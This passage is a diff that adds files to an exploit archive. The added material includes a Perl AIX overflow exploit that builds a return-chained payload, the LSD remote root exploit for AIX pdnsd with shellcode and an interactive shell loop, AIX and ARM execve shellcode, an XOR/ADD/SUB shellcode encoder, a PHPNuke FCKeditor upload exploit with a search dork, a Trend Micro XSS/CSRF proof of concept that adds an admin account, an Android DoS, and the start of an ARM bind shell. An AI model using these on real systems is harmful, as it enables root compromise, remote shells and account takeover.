# only the relevant instructions are shown also note that b r0
# is in fact something like mfsbr r0, bsbr or what that is in
# RS6000 assembly.
#
# The final call is to system which needs the following arguments:
# r3 = address of command to execute
# r2 = TOC (what is TOC anyway), I don't know if it does matter but
# we set it anyway (we can so why not do it)
# r1 = SP but this is ok already,
# the rest is free so it seems.
#
# Our route:
# 0x10010150: sets r2 to a place in the buffer and jumps to 0x10015228
# 0x10015228: loads r12 with a value from our buffera
# loads r0 with the next address to jump to (0x1001038c)
# and sets r2 to another place in our buffer
# 0x1001038c: sets r3 to a place in the buffer (finally!)
# sets r0 to next address to jump to (0xd00406d4, system(...))
#
# The flow with registers is thus:
# r2 = 0x14(r1)
# r12 = 0x110(r2)
# r0 = 0x0(r12)
# r2 = 0x4(r12)
# r3 = 0x40(r1)
# r12 = 0x3c(r2)
# 0x14(r1) = r12 this is the plave where TOC is stored but it doesn't seem
# to matter
# r0 = 0x0(12)
# r2 = 0x04(r12)
# and of we go...
#
# We set:
# $buf = the buffer on the stack $buf[0] is the first byte in the buffer
# but we will count offsets from 4 (the first 4 bytes is just "CEL " is
# doesn't matter, only the space does (it makes sure the rest of the buffer)
# stays the way it is and isn't converted into lower case
#
# Offsets:
# 0x000: 0x1001038c
# 0x004: buf[0]
# 0x008: this is the place where the address of the systemcall is taken from
# 0xd00406d4 in our case# 0x00c: thi is the address where r2 is
loaded
# from just before the call to
# system(..) we set it to the TOC in our program we don't know if it
# matters and if the TOC is constant between hosts
# 0x03c: buf[08]
# 0x110: buf[0]
# 0x204: return address (0x10010150)
# 0x210: buf[0]
# 0x23c: buf[0x240]
# 0x240: "/tmp/sh" or whatever command you want to execute
# r1 points to buf[0x1fc]
#
# I assume the positions in the libraries/program are fixed and that TOC
# either doesn't matter or is fixed to please enlighten me on these topics.
#
# 0x10010150:
# l r2, 0x14(r1)
# b 0x10015228
# 0x10015228:
# l r12, 0x110(r2)
# st r12, 0x14(r1)
# l r0, 0x0(r12)
# l r2, 0x4(r12)
# b r0
# 0x1001038c:
# l r3, 0x40(r1)
# b 0x100136f8
# 0x100136f8:
# l r12, 0x3c(r2)
# st r12, 0x14(r1)
# l r0, 0x0(r12)
# l r2, 0x04(r12)
# *** Synnergy Networks
$bufstart = 0x2ff22724; # this is our first guess
$nop = "\xde\xad\xca\xfe";
$buf = "CEL ";
$buf .= "\x10\x01\x03\x8c"; # 0 address of second piece of
# 'borrowed' code
$buf .= pack ("N", $bufstart); # 4
$buf .= "\xd0\x04\x06\xd4"; # 8 system call..
$buf .= "\xf0\x14\x63\x5c"; # c TOC
$offset = 0x10;
while ($offset < 0x3c) {
$offset += 4;
$buf .= $nop;
}
$buf .= pack ("N", $bufstart + 0x008);
$offset += 4;
while ($offset < 0x110) {
$offset += 4;
$buf .= $nop;
}
$buf .= pack ("N", $bufstart);
$offset += 4;
while ($offset < 0x204) {
$offset += 4;
$buf .= $nop;
}
$buf .= "\x10\x01\x01\x50";
$offset += 4;
while ($offset < 0x210) {
$offset += 4;
$buf .= $nop;
}
$buf .= pack ("N", $bufstart);
$offset += 4;
while ($offset < 0x23c) {
$offset += 4;
$buf .= $nop;
}
$buf .= pack ("N", $bufstart + 0x240);
$offset += 4;
while ($offset < 0x240) {
$offset += 4;
$buf .= $nop;
}
# this is the command that will be run through system
$buf .= "/tmp/sh";
$buf .= "\n";
# offcourse you should change this .
# open F, "| nc -v -v -n 192.168.2.12 21";
open F, "| od -tx1";
printf F $buf;
close F;
# EOF

195
platforms/aix/remote/21093.c Executable file
View file

@ -0,0 +1,195 @@
source: http://www.securityfocus.com/bid/3237/info
The Source Code Browser's Program Database Name Server Daemon (pdnsd) component of the C Set ++ compiler for AIX contains a remotely exploitable buffer overflow. This vulnerability allows local or remote attackers to compromise root privileges on vulnerable systems.
/*## copyright LAST STAGE OF DELIRIUM oct 1999 poland *://lsd-pl.net/ #*/
/*## pdnsd #*/
/* note: to avoid potential system hang-up please, first obtain the exact */
/* AIX OS level with the use of some OS fingerprinting method */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#define ADRNUM 4000
#define NOPNUM 4800
#define ALLIGN 1
#define SCAIX41 "\x03\x68\x41\x5e\x6d\x7f\x6f\xd6\x57\x56\x55\x53"
#define SCAIX42 "\x02\x71\x46\x62\x76\x8e\x78\xe7\x5b\x5a\x59\x58"
char syscallcode[]=
"\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */
"\x40\x82\xff\xfd" /* bnel <syscallcode> */
"\x7e\xa8\x02\xa6" /* mflr r21 */
"\x3a\xc0\x01\xff" /* lil r22,0x1ff */
"\x3a\xf6\xfe\x2d" /* cal r23,-467(r22) */
"\x7e\xb5\xba\x14" /* cax r21,r21,r23 */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x20" /* bctr */
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca 0x0 */
"\x3a\xb5\xff\xf8" /* cal r21,-8(r21) */
;
char findsckcode[]=
"\x2c\x74\x12\x34" /* cmpi cr0,r20,0x1234 */
"\x41\x82\xff\xfd" /* beql <findsckcode> */
"\x7f\x08\x02\xa6" /* mflr r24 */
"\x3b\x36\xfe\x2d" /* cal r25,-467(r22) */
"\x3b\x40\x01\x01" /* lil r26,0x16 */
"\x7f\x78\xca\x14" /* cax r27,r24,r25 */
"\x7f\x69\x03\xa6" /* mtctr r27 */
"\x4e\x80\x04\x20" /* bctr */
"\xa3\x78\xff\xfe" /* lhz r27,-2(r24) */
"\xa3\x98\xff\xfa" /* lhz r28,-6(r24) */
"\x7c\x1b\xe0\x40" /* cmpl cr0,r27,r28 */
"\x3b\x36\xfe\x59" /* cal r25,-423(r22) */
"\x41\x82\xff\xe4" /* beq <findsckcode+20> */
"\x7f\x43\xd3\x78" /* mr r3,r26 */
"\x38\x98\xff\xfc" /* cal r4,-4(r24) */
"\x38\xb8\xff\xf4" /* cal r5,-12(r24) */
"\x93\x38\xff\xf4" /* st r25,-12(r24) */
"\x88\x55\xff\xf6" /* lbz r2,-10(r21) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x21" /* bctrl */
"\x37\x5a\xff\xff" /* ai. r26,r26,-1 */
"\x2d\x03\xff\xff" /* cmpi cr2,r3,-1 */
"\x40\x8a\xff\xc8" /* bne cr2,<findsckcode+32> */
"\x40\x82\xff\xd8" /* bne <findsckcode+48> */
"\x3b\x36\xfe\x03" /* cal r25,-509(r22) */
"\x3b\x76\xfe\x02" /* cal r27,-510(r22) */
"\x7f\x23\xcb\x78" /* mr r3,r25 */
"\x88\x55\xff\xf7" /* lbz r2,-9(r21) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x21" /* bctrl */
"\x7c\x7a\xda\x14" /* cax r3,r26,r27 */
"\x7e\x84\xa3\x78" /* mr r4,r20 */
"\x7f\x25\xcb\x78" /* mr r5,r25 */
"\x88\x55\xff\xfb" /* lbz r2,-5(r21) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x21" /* bctrl */
"\x37\x39\xff\xff" /* ai. r25,r25,-1 */
"\x40\x80\xff\xd4" /* bge <findsckcode+100> */
;
char shellcode[]=
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x55\xff\xf4" /* lbz r2,-12(r21) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x20" /* bctr */
"/bin/sh"
;
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv){
char buffer[10000],address[4],*b;
int i,n,l,cnt,sck;
struct hostent *hp;
struct sockaddr_in adr;
printf("copyright LAST STAGE OF DELIRIUM oct 1999 poland //lsd-pl.net/\n");
printf("pdnsd for AIX 4.1 4.2 PowerPC/POWER\n\n");
if(argc!=3){
printf("usage: %s address 41|42\n",argv[0]);exit(-1);
}
switch(atoi(argv[2])){
case 41: memcpy(&syscallcode[32],SCAIX41,12); break;
case 42: memcpy(&syscallcode[32],SCAIX42,12); break;
default: exit(-1);
}
sck=socket(AF_INET,SOCK_STREAM,0);
adr.sin_family=AF_INET;
adr.sin_port=htons(4242);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if((hp=gethostbyname(argv[1]))==NULL){
errno=EADDRNOTAVAIL;perror("error");exit(-1);
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
if(connect(sck,(struct sockaddr*)&adr,sizeof(struct sockaddr_in))<0){
perror("error");exit(-1);
}
l=ADRNUM+NOPNUM+strlen(shellcode);
*((unsigned long*)address)=htonl(0x2ff20908+(NOPNUM>>1));
i=sizeof(struct sockaddr_in);
if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
struct netbuf {unsigned int maxlen;unsigned int len;char *buf;}nb;
ioctl(sck,(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck,(('T'<<8)|144),&nb);
}
n=ntohs(adr.sin_port);
printf("port=%d connected! ",n);fflush(stdout);
findsckcode[0+2]=(unsigned char)((n&0xff00)>>8);
findsckcode[0+3]=(unsigned char)(n&0xff);
b=buffer;
*((unsigned long*)b)=htonl(l);
b+=4;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(syscallcode);i++) *b++=syscallcode[i];
for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
for(i=0;i<ALLIGN;i++) *b++=address[i%4];
for(i=0;i<ADRNUM;i++) *b++=address[i%4];
*b=0;
write(sck,buffer,4+l-1);sleep(3);
send(sck,"x",1,0);
printf("sent!\n");
write(sck,"/bin/uname -a\n",14);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck,buf,cnt);
}
if(FD_ISSET(sck,&fds)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
}

40
platforms/aix/shellcode/13241.txt Executable file
View file

@ -0,0 +1,40 @@
/*
* Aix
* execve() of /bin/sh Georgi Guninski (guninski@hotmail.com)
*/
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
/* disassembly
7c0802a6 mfspr r0,LR
9421fbb0 stu SP,-1104(SP) --get stack
90010458 st r0,1112(SP)
3c60f019 cau r3,r0,0xf019 --CTR
60632c48 lis r3,r3,11336 --CTR
90610440 st r3,1088(SP)
3c60d002 cau r3,r0,0xd002 --TOC
60634c0c lis r3,r3,19468 --TOC
90610444 st r3,1092(SP)
3c602f62 cau r3,r0,0x2f62 --'/bin/sh\x01'
6063696e lis r3,r3,26990
90610438 st r3,1080(SP)
3c602f73 cau r3,r0,0x2f73
60636801 lis r3,r3,26625
3863ffff addi r3,r3,-1
9061043c st r3,1084(SP) --terminate with 0
30610438 lis r3,SP,1080
7c842278 xor r4,r4,r4 --argv=NULL
80410440 lwz RTOC,1088(SP)
80010444 lwz r0,1092(SP) --jump
7c0903a6 mtspr CTR,r0
4e800420 bctr --jump
*/
# milw0rm.com [2004-09-26]

149
platforms/aix/webapps/14058.html Executable file
View file

@ -0,0 +1,149 @@
# Title : PHPnuke 8.2 Remote Upload File Exploit
# Author : Net.Edit0r
# Location : Iran
# Dork : "POWERED BY PHPNUKE.IR"
# Category : Remote
# Email : Net.Edit0r@Att.net ~ Black.Hat.TM@Gmail.com
# Special Thanks To :NetQurd (For help in finding bugs) > Email
:NetQurd@Live.CoM
[~]######################################### InformatioN
#############################################[~]
[~] 1.Save code html format
[~] 2.Search Target.com
[~] 3.Edit and replace & Target
[~] 4.Save Html Page
[~] 5.Open Page Html (Edite Source)
[~] 6.Set Format PHP
[~] 7.Choose File & Upload
[~] 8.Formats can be uploaded (Html.Htm.Jpg.gif.Xml....)
[~] 9.Target.com/images/uploads/File/File Name
[~]######################################### ExploiT
#############################################[~]
[~] 1. Exploit File :
<!--
* FCKeditor - The text editor for Internet - http://www.Sun
* Test page for the File Browser connectors.
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FCKeditor - By Net.Edit0r</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
<table height="100%" cellspacing="0" cellpadding="0" width="100%"
border="0">
<tr>
<td>
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td>
Connector:<br />
<select id="cmbConnector" name="cmbConnector">
<option value="asp/connector.asp" selected="selected">ASP</option>
<option value="aspx/connector.aspx">ASP.Net</option>
<option value="cfm/connector.cfm">ColdFusion</option>
<option value="lasso/connector.lasso">Lasso</option>
<option value="perl/connector.cgi">Perl</option>
<option value="
http://Target.com/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php
">PHP</option>
<option value="py/connector.py">Python</option>
</select>
</td>
<td>
   </td>
<td>
Current Folder<br />
<input id="txtFolder" type="text" value="/" name="txtFolder" /></td>
<td>
   </td>
<td>
Resource Type<br />
<select id="cmbType" name="cmbType">
<option value="File" selected="selected">File</option>
<option value="Image">Image</option>
<option value="Flash">Flash</option>
<option value="Media">Media</option>
<option value="Invalid">Invalid Type (for testing)</option>
</select>
</td>
</tr>
</table>
<br />
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td valign="top">
<a href="#" onclick="GetFolders();">Get Folders</a></td>
<td>
   </td>
<td valign="top">
<a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>
<td>
   </td>
<td valign="top">
<a href="#" onclick="CreateFolder();">Create Folder</a></td>
<td>
   </td>
<td valign="top">
<form id="frmUpload" action="" target="eRunningFrame" method="post"
enctype="multipart/form-data">
File Upload<br />
<input id="txtFileUpload" type="file" name="NewFile" />
<input type="submit" value="Upload" onclick="SetAction();" />
</form>
</td>
</tr>
</table>
<br />
URL: <span id="eUrl"></span>
</td>
</tr>
<tr>
<td height="100%" valign="top">
<iframe id="eRunningFrame" src="javascript:void(0)" name="eRunningFrame"
width="100%"
height="100%"></iframe>
</td>
</tr>
</table>
</body>
</html>
[~]######################################## ThankS To ...
#########################################[~]
[~] Special Thanks To My Best FriendS :
NetQard , B3hz4d , Raiden , ~[ CriMe ]~ , † CoNstaNtine † , _R3v4l_ ,
~~XTerror~~ , __l2o5v4__ , Zend
[~] IRANIAN Young HackerZ
[~] GreetZ : Sun-Army.Org , Phc.Ir , Dark-tunnel.com , AttackerZ.IR
[~]######################################### FinisH :D
#############################################[~]

54
platforms/aix/webapps/21319.txt Executable file
View file

@ -0,0 +1,54 @@
# Exploit Title: Trend Micro InterScan Messaging Security Suite Stored XSS and CSRF
# Date: 13/09/2012
# Exploit Author: modpr0be (modpr0be[at]spentera.com)
# Vendor Homepage: http://www.trendmicro.com
# Software Link: http://www.trendmicro.com/ftp/products/interscan/IMSS_v7.1_Win_1394.zip
# Version: 7.1-Build_Win32_1394
# Tested on: Windows 2003 Standard Edition, XAMPP 1.7.4 (Default Config)
# CVE : CVE-2012-2995, CVE-2012-2996
# Software Description
# TrendMicro Interscan Messaging Security is the industrys most comprehensive
# mail gateway security. Choose state-of-the-art software or a hybrid solution
# with on-premise virtual appliance and optional cloud pre-filter that blocks
# the vast majority of spam and malware outside your network. Plus our Data
# Privacy and Encryption Module secure outbound data to ensure privacy and
# regulatory compliance.
# Vulnerability Overview
# Trend Micro InterScan Messaging Security Suite is susceptible to cross-site scripting (CWE-79)
# and cross-site request forgery (CWE-352) vulnerabilities.
# Proof of Concept
# Persistent/Stored XSS
# this POC will store defined URL to white list URL page. Each time we access to this page, the XSS word
# will pop up to the user. You can change the alert message box to something nasty (e.g redirect to beef??)
hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"><script>alert('XSS')</script>
# Non-persistent/Reflected XSS
# This is non-persistent XSS, you might lure target user to click this link :)
hxxps://127.0.0.1/initUpdSchPage.imss?src="><script>alert('XSS')</script>
# Cross-Site Request Forgery
# This POC should be targeted to user with admin privilege
# It will add admin user with user quorra, and password quorra.123
# Target victim must be authenticated when perform this POC
<html>
<body>
<form action="hxxps://127.0.0.1:8445/saveAccountSubTab.imss" method="POST">
<input type="hidden" name="enabled" value="on" />
<input type="hidden" name="authMethod" value="1" />
<input type="hidden" name="name" value="quorra" />
<input type="hidden" name="password" value="quorra.123" />
<input type="hidden" name="confirmPwd" value="quorra.123" />
<input type="hidden" name="tabAction" value="saveAuth" />
<input type="hidden" name="gotoTab" value="saveAll" />
<input type="submit" value="CSRF" />
</form>
</body>
</html>
# References
# http://www.spentera.com/advisories/2012/SPN-05-2012.html
# http://www.kb.cert.org/vuls/id/471364
# http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html

92
platforms/arm/dos/23248.txt Executable file
View file

@ -0,0 +1,92 @@
# Exploit Title: Android Kernel 2.6 Local DoS
# Date: 12/7/12
# Author: G13
# Twitter: @g13net
# Versions: Android 2.2, 2.3
# Category: DoS (android)
#
##### Vulnerability #####
The Android OS is vulnerable to a local DoS when a filename with a
length of 2048
or larger is attempted to be written to the sdcard(vfat fs) multiple times.
The result of successful running of the exploit code is the system restarting.
The vulnerability only effects Android kernels that are in the version
2.6 family.
##### Vendor Timeline #####
The Android Security Team has been contacted with updated PoC code and
details.
They have been aware of this vulnerability for over a year.
##### Tombstone #####
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint:
'verizon/SCH-I800/SCH-I800:2.3.4/GINGERBREAD/EF01:user/release-keys'
pid: 349, tid: 363, name: SensorService >>> system_server <<<
signal 8 (SIGFPE), code -6 (?), fault addr 0000015d
r0 00000000 r1 00000008 r2 00000040 r3 00000000
r4 2a114310 r5 00000000 r6 51504690 r7 00000025
r8 2a114330 r9 2a114350 sl 00000003 fp 00000003
ip fffd4084 sp 51501eb0 lr 40039b70 pc 40037cf0 cpsr 20030010
d0 4271bc7bd0b80000 d1 0000000000000000
d2 0000000000000000 d3 427181eae9200000
d4 0000000000000000 d5 0000000000000000
d6 0000000000000000 d7 0000000000000000
d8 0000000000000000 d9 0000000000000000
d10 0000000000000000 d11 0000000000000000
d12 0000000000000000 d13 0000000000000000
d14 0000000000000000 d15 0000000000000000
d16 3fe99999a0000000 d17 3fe999999999999a
d18 0033003200310030 d19 0000000000000000
d20 3fc554e7eb0eb47c d21 3e66376972bea4d0
d22 3f4de16b9c24a98f d23 3fb0f4a31edab38b
d24 3fede16b9c24a98f d25 3fe55559ee5e69f9
d26 0000000000000000 d27 0000000000000000
d28 0000000000000005 d29 0000000000000000
d30 0000000000000000 d31 0000000000000000
scr 20000010
backtrace:
#00 pc 0000dcf0 /system/lib/libc.so (kill+12)
#01 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#02 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#03 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#04 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#05 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#06 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#07 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#08 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#09 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#10 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#11 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#12 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#13 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#14 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#15 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
#16 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)
##### PoC #####
#include <stdio.h>
int main(int argc, char** argv) {
char buf[5000];
int j,k;
FILE *fp;
/* Path to sdcard, typically /sdcard/ */
strcpy(buf,"/sdcard/");
for(k=0;k<=2048;k++){
strcat(buf,"A");
};
for(j=0;j<=50;j++){
fp=fopen(buf,"w");
};
return 0;
}

86
platforms/arm/shellcode/14190.c Executable file
View file

@ -0,0 +1,86 @@
/*
Title: Linux/ARM - Polymorphic execve("/bin/sh", ["/bin/sh"], NULL); - XOR 88 encoded - 78 bytes
Date: 2010-06-28
Tested on: ARM926EJ-S rev 5 (v5l)
Author: Jonathan Salwan
Web: http://shell-storm.org | http://twitter.com/jonathansalwan
! Database of shellcodes http://www.shell-storm.org/shellcode/
== Disassembly of XOR decoder ==
00008054 <debut-0x8>:
8054: e28f6024 add r6, pc, #36 ; 0x24
8058: e12fff16 bx r6
0000805c <debut>:
805c: e3a040e3 mov r4, #227 ; 0xe3
00008060 <boucle>:
8060: e3540c01 cmp r4, #256 ; 0x100
8064: 812fff1e bxhi lr
8068: e24440e3 sub r4, r4, #227 ; 0xe3
806c: e7de5004 ldrb r5, [lr, r4]
8070: e2255058 eor r5, r5, #88 ; 0x58
8074: e7ce5004 strb r5, [lr, r4]
8078: e28440e4 add r4, r4, #228 ; 0xe4
807c: eafffff7 b 8060 <boucle>
8080: ebfffff5 bl 805c <debut>
== Disassembly of execve("/bin/sh", ["/bin/sh"], NULL) ==
00008054 <_start>:
8054: e28f6001 add r6, pc, #1 ; 0x1
8058: e12fff16 bx r6
805c: 4678 mov r0, pc
805e: 300a adds r0, #10
8060: 9001 str r0, [sp, #4]
8062: a901 add r1, sp, #4
8064: 1a92 subs r2, r2, r2
8066: 270b movs r7, #11
8068: df01 svc 1
806a: 2f2f cmp r7, #47
806c: 6962 ldr r2, [r4, #20]
806e: 2f6e cmp r7, #110
8070: 6873 ldr r3, [r6, #4]
*/
#include <stdio.h>
char SC[] = "\x24\x60\x8f\xe2"
"\x16\xff\x2f\xe1"
"\xe3\x40\xa0\xe3"
"\x01\x0c\x54\xe3"
"\x1e\xff\x2f\x81"
"\xe3\x40\x44\xe2"
"\x04\x50\xde\xe7"
"\x58\x50\x25\xe2"
"\x04\x50\xce\xe7"
"\xe4\x40\x84\xe2"
"\xf7\xff\xff\xea"
"\xf5\xff\xff\xeb"
"\x59\x68\xd7\xba"
"\x4b\xa7\x77\xb9"
"\x20\x1e\x52\x68"
"\x59\xc8\x59\xf1"
"\xca\x42\x53\x7f"
"\x59\x87\x77\x77"
"\x3a\x31\x36\x77"
"\x2b\x30";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC));
(*(void(*)()) SC)();
return 0;
}

143
platforms/arm/shellcode/14261.c Executable file
View file

@ -0,0 +1,143 @@
/*
Title: Generator polymorphic shellcode on ARM architecture
Date: 2010-07-07
Tested on: ARM926EJ-S rev 5 (v5l)
Author: Jonathan Salwan
Web: http://shell-storm.org | http://twitter.com/jonathansalwan
! Database of shellcodes http://www.shell-storm.org/shellcode/
Credit
======
This code generates a shellcode polymorphic execve("/bin/sh", ["/bin/sh"], NULL)
on ARM architecture.
You can encode your shellcode with XOR, ADD, SUB
*/
#include <stdio.h>
#include <stdio.h>
/* execve("/bin/sh", ["/bin/sh"], NULL); */
unsigned char your_SC[] = "\x01\x30\x8f\xe2"
"\x13\xff\x2f\xe1"
"\x78\x46\x0a\x30"
"\x01\x90\x01\xa9"
"\x92\x1a\x0b\x27"
"\x01\xdf\x2f\x2f"
"\x62\x69\x6e\x2f"
"\x73\x68";
void syntax(void)
{
fprintf(stdout,"\nSyntax: ./encode <type> <value>\n\n");
fprintf(stdout,"Type: -xor\n");
fprintf(stdout," -add\n");
fprintf(stdout," -sub\n\n");
fprintf(stdout,"Exemple: ./encode -xor 20\n\n");
exit(1);
}
int main(int argc, char *argv[])
{
if(argc != 3){
syntax();
return 1;
}
if(!strcmp(argv[1], "-xor"))
{
fprintf(stdout,"Encode : XOR %s\n", argv[2]);
fprintf(stdout,"Encoded: \n");
int num = (256-strlen(your_SC))+1;
int num2 = num + 1;
fprintf(stdout, "\\x24\\x60\\x8f\\xe2"
"\\x16\\xff\\x2f\\xe1"
"\\x%.2x\\x40\\xa0\\xe3"
"\\x01\\x0c\\x54\\xe3"
"\\x1e\\xff\\x2f\\x81"
"\\x%.2x\\x40\\x44\\xe2"
"\\x04\\x50\\xde\\xe7"
"\\x%.2x\\x50\\x25\\xe2"
"\\x04\\x50\\xce\\xe7"
"\\x%.2x\\x40\\x84\\xe2"
"\\xf7\\xff\\xff\\xea"
"\\xf5\\xff\\xff\\xeb"
,num, num, atoi(argv[2]), num2);
for (int i=0;i<sizeof(your_SC)-1;i++){
your_SC[i] = your_SC[i]^atoi(argv[2]);
fprintf(stdout,"\\x%.2x", your_SC[i]);
}
fprintf(stdout,"\n");
}
if(!strcmp(argv[1], "-add"))
{
fprintf(stdout,"Encode : ADD %s\n", argv[2]);
fprintf(stdout,"Encoded: \n");
int num = (256-strlen(your_SC))+1;
int num2 = num + 1;
fprintf(stdout, "\\x24\\x60\\x8f\\xe2"
"\\x16\\xff\\x2f\\xe1"
"\\x%.2x\\x40\\xa0\\xe3"
"\\x01\\x0c\\x54\\xe3"
"\\x1e\\xff\\x2f\\x81"
"\\x%.2x\\x40\\x44\\xe2"
"\\x04\\x50\\xde\\xe7"
"\\x%.2x\\x50\\x45\\xe2"
"\\x04\\x50\\xce\\xe7"
"\\x%.2x\\x40\\x84\\xe2"
"\\xf7\\xff\\xff\\xea"
"\\xf5\\xff\\xff\\xeb"
,num, num, atoi(argv[2]), num2);
for (int i=0;i<sizeof(your_SC)-1;i++){
your_SC[i] = your_SC[i]+atoi(argv[2]);
fprintf(stdout,"\\x%.2x", your_SC[i]);
}
fprintf(stdout,"\n");
}
if(!strcmp(argv[1], "-sub"))
{
fprintf(stdout,"Encode : SUB %s\n", argv[2]);
fprintf(stdout,"Encoded: \n");
int num = (256-strlen(your_SC))+1;
int num2 = num + 1;
fprintf(stdout, "\\x24\\x60\\x8f\\xe2"
"\\x16\\xff\\x2f\\xe1"
"\\x%.2x\\x40\\xa0\\xe3"
"\\x01\\x0c\\x54\\xe3"
"\\x1e\\xff\\x2f\\x81"
"\\x%.2x\\x40\\x44\\xe2"
"\\x04\\x50\\xde\\xe7"
"\\x%.2x\\x50\\x85\\xe2"
"\\x04\\x50\\xce\\xe7"
"\\x%.2x\\x40\\x84\\xe2"
"\\xf7\\xff\\xff\\xea"
"\\xf5\\xff\\xff\\xeb"
,num, num, atoi(argv[2]), num2);
for (int i=0;i<sizeof(your_SC)-1;i++){
your_SC[i] = your_SC[i]-atoi(argv[2]);
fprintf(stdout,"\\x%.2x", your_SC[i]);
}
fprintf(stdout,"\n");
}
return 0;
}

48
platforms/arm/shellcode/14907.c Executable file
View file

@ -0,0 +1,48 @@
/*
Title: Linux/ARM - execve("/bin/sh", [0], [0 vars]) - 27 bytes
Date: 2010-08-31
Tested on: ARM926EJ-S rev 5 (v5l)
Author: Jonathan Salwan - twitter: @jonathansalwan
shell-storm.org
Shellcode ARM with not a 0x20, 0x0a and 0x00
Disassembly of section .text:
00008054 <_start>:
8054: e28f3001 add r3, pc, #1 ; 0x1
8058: e12fff13 bx r3
805c: 4678 mov r0, pc
805e: 3008 adds r0, #8
8060: 1a49 subs r1, r1, r1
8062: 1a92 subs r2, r2, r2
8064: 270b movs r7, #11
8066: df01 svc 1
8068: 622f str r7, [r5, #32]
806a: 6e69 ldr r1, [r5, #100]
806c: 732f strb r7, [r5, #12]
806e: 0068 lsls r0, r5, #1
*/
#include <stdio.h>
char SC[] = "\x01\x30\x8f\xe2"
"\x13\xff\x2f\xe1"
"\x78\x46\x08\x30"
"\x49\x1a\x92\x1a"
"\x0b\x27\x01\xdf"
"\x2f\x62\x69\x6e"
"\x2f\x73\x68";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC));
(*(void(*)()) SC)();
return 0;
}

113
platforms/arm/shellcode/15314.S Executable file
View file

@ -0,0 +1,113 @@
/*
* Title: arm-bind-listen
* Brief: Bind a shell to port 0x1337 on any local address and
* wait for connections
* Author: Daniel Godas-Lopez <gmail account dgodas>
*/
/*
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
*/
mov %r0, $2 /* AF_INET */
mov %r1, $1 /* SOCK_STREAM */
mov %r2, $6 /* IPPRTOTO_TCP */
